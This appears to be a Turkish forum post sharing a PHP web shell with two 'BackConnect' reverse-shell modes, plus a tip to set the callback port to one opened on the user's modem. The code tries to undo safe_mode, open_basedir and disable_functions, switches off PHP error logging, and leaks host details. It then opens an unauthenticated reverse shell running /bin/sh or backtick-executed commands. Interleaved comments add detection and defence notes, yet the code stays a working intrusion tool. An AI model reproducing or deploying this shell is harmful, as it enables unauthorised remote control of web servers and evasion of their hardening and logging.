
dc çift bağlantı script shell

443 yazan yere modeminizde açtığınız açık portu yazın

Code:
<?
// Review note: this preamble tries to undo PHP hardening before anything else
// runs. Each ini_restore() call asks PHP to reset the named directive to its
// startup value; the leading @ suppresses any warning the call raises.
// Whether an override is actually undone depends on the PHP version and on
// how the directive was set — verify against the affected host's configuration.
// Static-analysis hint: ini_restore() on safe_mode / open_basedir /
// disable_functions has no place in ordinary application code, so this run of
// calls is a strong indicator when scanning a web root.
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");

// Sets error_log to NULL and log_errors to 0 for the rest of the request, so
// errors raised by the code below are not meant to reach the PHP error log.
// Incident responders should therefore rely on web-server access logs and
// network/process telemetry rather than on the PHP error log.
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
?>
<?
// Echoes safe_mode and open_basedir, restores both, then echoes them again;
// comparing the two pairs shows whether ini_restore() changed anything.
// The values are written with no separator straight into the HTTP response,
// ahead of the DOCTYPE that follows this block.
echo ini_get("safe_mode");
echo ini_get("open_basedir");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<meta http-equiv=Content-Type content="text/html; charset=windows-1254">
</HEAD>
<BODY>
<CENTER>
 <?php
// Writes the php_uname() string (operating system, host name, release/version
// and machine type) into the page for every visitor: host fingerprinting data
// disclosed without any access check visible on this page.
$uname = php_uname();
echo "Uname -a :$uname";
?>
<br><br>
<a href="?BackConnect=PHP_1">PHP BackConnect 1</a>
&nbsp;&nbsp; <a href="?BackConnect=PHP_2">PHP BackConnect 2</a>
 <?php
// Prints $string followed by a newline unless $daemon is truthy.
// NOTE(review): $daemon is not a parameter and is not declared `global`, so
// inside this function it is an undefined local and the condition is always
// true. Every status message passed here is therefore written to the HTTP
// response, including after the script has set its own $daemon to 1.
function printit ($string) {
   if (!$daemon) {
      print "$string\n";
   }
}
// Dispatcher for the two "BackConnect" links rendered above. The mode comes
// straight from the query string and no authentication or access check is
// visible anywhere on this page: any client that can request the URL can
// trigger either branch. Both branches connect back to the requester's own
// address ($_SERVER["REMOTE_ADDR"]) on TCP port 443.
//
// Defender notes (apply to both branches):
//  - Everything here depends on fsockopen plus proc_open / system / backticks
//    (and pcntl_fork in branch 1); listing those in disable_functions where
//    the application does not need them makes the branches fail.
//  - The web-server account opens an outbound connection to the client that
//    just made the request, and the traffic on 443 is plain text, not TLS.
//    Egress filtering on web servers blocks it; flow logs and protocol
//    inspection expose it.
//  - The web-server/PHP process gains a shell child process; process-lineage
//    alerts on that parent/child pair catch both branches.
$bc = $_GET["BackConnect"];
switch($bc){
case "PHP_1": 

// Branch 1: full interactive relay. Removes the execution time limit, tries
// to detach from the web request, then bridges a TCP socket to a shell
// process started with proc_open().
set_time_limit (0);
$VERSION = "1.0";
$ip = $_SERVER["REMOTE_ADDR"];
$port = 443;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
// Command line handed to proc_open(): three reconnaissance commands followed
// by an interactive /bin/sh.
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
// Detach from the request if the pcntl extension is loaded: the parent exits
// at once (ending the HTTP request) while the child becomes a session leader
// and keeps running.
if (function_exists('pcntl_fork')) { 

   $pid = pcntl_fork(); 

   if ($pid == -1) {
      printit("ERROR: Can't fork");
      exit(1);
   } 

   if ($pid) {
      exit(0);  // Parent exits
   }
   if (posix_setsid() == -1) {
      printit("Error: Can't setsid()");
      exit(1);
   } 

   $daemon = 1;
} else {
   print("WARNING: Failed to daemonise.  This is quite common and not fatal.");
} 

// Change to a safe directory
chdir("/"); 

// Remove any umask we inherited
// (umask(0) means files created from here on get no permission bits masked)
umask(0); 

//
// Do the reverse shell...
// 

// Open reverse connection (30-second connect timeout)
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
   printit("$errstr ($errno)");
   exit(1);
} 

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
); 

$process = proc_open($shell, $descriptorspec, $pipes); 

if (!is_resource($process)) {
   printit("ERROR: Can't spawn shell");
   exit(1);
} 

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0); 

printit("Successfully opened reverse shell to $ip:$port"); 

// Relay loop: runs until either the TCP peer or the shell's stdout reaches
// end-of-file. set_time_limit(0) above means PHP itself will not stop it.
while (1) {
   // Check for end of TCP connection
   if (feof($sock)) {
      printit("ERROR: Shell connection terminated");
      break;
   } 

   // Check for end of STDOUT
   if (feof($pipes[1])) {
      printit("ERROR: Shell process terminated");
      break;
   } 

   // Wait until a command is sent down $sock, or some
   // command output is available on STDOUT or STDERR
   // (null timeout: stream_select blocks until one stream is readable)
   $read_a = array($sock, $pipes[1], $pipes[2]);
   $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); 

   // If we can read from the TCP socket, send
   // data to process's STDIN
   if (in_array($sock, $read_a)) {
      if ($debug) printit("SOCK READ");
      $input = fread($sock, $chunk_size);
      if ($debug) printit("SOCK: $input");
      fwrite($pipes[0], $input);
   } 

   // If we can read from the process's STDOUT
   // send data down tcp connection
   if (in_array($pipes[1], $read_a)) {
      if ($debug) printit("STDOUT READ");
      $input = fread($pipes[1], $chunk_size);
      if ($debug) printit("STDOUT: $input");
      fwrite($sock, $input);
   } 

   // If we can read from the process's STDERR
   // send data down tcp connection
   if (in_array($pipes[2], $read_a)) {
      if ($debug) printit("STDERR READ");
      $input = fread($pipes[2], $chunk_size);
      if ($debug) printit("STDERR: $input");
      fwrite($sock, $input);
   }
} 

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process); 

// NOTE(review): the two comment lines below describe printit(), which is
// defined above the switch; they appear to have been left behind here.
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
break;
case "PHP_2":
          // Branch 2: line-at-a-time variant. No fork and no pipes; each line
          // received on the socket is executed through the backtick (shell
          // execution) operator and the output is written back.
          $ipim=$_SERVER["REMOTE_ADDR"];
         $portum="443";
         if ($ipim <> "")
         {
         $mucx=fsockopen($ipim , $portum , $errno, $errstr );
         if (!$mucx){
               // $result is assigned but never printed or returned on this page.
               $result = "Error: didnt connect !!!";
         }
         else {  

         $zamazing0="\n";
         // Banner string: a fixed literal usable as a content signature.
         fputs ($mucx ,"\nwelcome ZoRBaCK\n\n");
         // system() prints the command's full output to the HTTP response and
         // returns only its last line, so the socket receives that last line
         // while the complete output lands in the response body.
         fputs($mucx , system("uname -a") .$zamazing0 );
         fputs($mucx , system("pwd") .$zamazing0 );
         fputs($mucx , system("id") .$zamazing0.$zamazing0 );
         // Command loop: runs until the peer closes the connection.
         while(!feof($mucx)){
         // NOTE(review): fputs() is called here with the stream only and no
         // data argument — confirm how the PHP version in use handles it.
         fputs ($mucx);
        $one="[$";
        $two="]";
        // Reads up to 8192 bytes of one line from the peer and passes it
        // unmodified to the shell via backticks.
        $result= fgets ($mucx, 8192);
        $message=`$result`;
       fputs ($mucx, $one. system("whoami") .$two. " " .$message."\n");
      }
      fclose ($mucx);
         }
         }  

break; 

}
?>
</CENTER>
</BODY>
</HTML>